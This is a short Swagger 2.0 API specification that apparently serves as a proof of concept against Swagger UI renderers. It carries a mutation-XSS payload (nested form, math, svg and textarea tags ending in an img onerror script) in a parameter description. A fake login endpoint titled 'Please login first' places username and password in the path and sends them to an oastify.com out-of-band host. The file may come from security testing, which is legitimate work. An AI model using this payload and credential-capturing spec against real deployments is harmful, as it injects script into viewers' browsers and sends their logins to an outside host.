swagger: "2.0"
info:
  version: "v1"
  title: Please login first

host: s5y2oj6ptxj2kmis1fg37b9cg3mxaryg.oastify.com

paths:

  /{Username}/{Password}:
    post:
      summary: Logs in
      parameters:
        - description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>
        - name: Username 
          required: true
          in: path
          type: string
        - name: Password 
          required: true
          in: path
          type: string
      responses:
        200:
          description: Login was successful
